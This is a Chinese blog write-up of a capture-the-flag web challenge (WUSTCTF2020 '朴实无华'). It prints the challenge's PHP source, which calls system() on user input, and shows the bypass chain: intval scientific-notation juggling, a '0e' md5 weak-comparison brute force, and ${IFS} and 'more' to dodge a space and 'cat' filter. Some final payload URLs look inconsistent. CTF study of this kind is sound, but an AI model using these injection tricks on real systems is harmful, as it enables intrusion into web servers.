BUUCTF-[WUSTCTF2020]朴实无华(代码审计)

1、在title看到bot,访问robots.txt
2、

User-agent: *
Disallow: /fAke_f1agggg.php

继续访问/fAke_f1agggg.php
3、在响应头发现/fl4g.php:

得到源码:

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

第一层:

if(intval($num) < 2020 && intval($num + 1) > 2021)


发现intval()函数在处理字符串型的科学计数法时,只输出e前面的数字
马上测试:

<?php
echo intval(1e10);
echo "\r\n";
echo intval("1e10");
echo "\r\n";
echo intval("1e10"+1);
?>

运行结果:

10000000000
1
10000000001

发现$a+1,如果$a是字符串型的科学计数法,$a+1后,$a会强制转换为数字
所以,url:/fl4g.php?num=1e10

第二层:

if ($md5==md5($md5))

要求字符串md5后还与原字符串弱相等
写脚本跑一下:

import hashlib

for i in range(0,10**41):
    i='0e'+str(i)
    md5=hashlib.md5(i.encode()).hexdigest()
    if md5[:2]=='0e' and md5[2:].isdigit():
        print('md5:{} '.format(i))
        break

十几分钟后跑出:

md5:0e215962017

url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017

第三层:

if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
		echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);

$get_flag不能有空格,不能有cat字符串
空格绕过,参考:https://www.freebuf.com/articles/web/137923.html
cat用more绕过
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017&get_flag=more${IFS}ls

posted @ 2020-04-08 11:33  Pur3  阅读(1472)  评论(0编辑  收藏  举报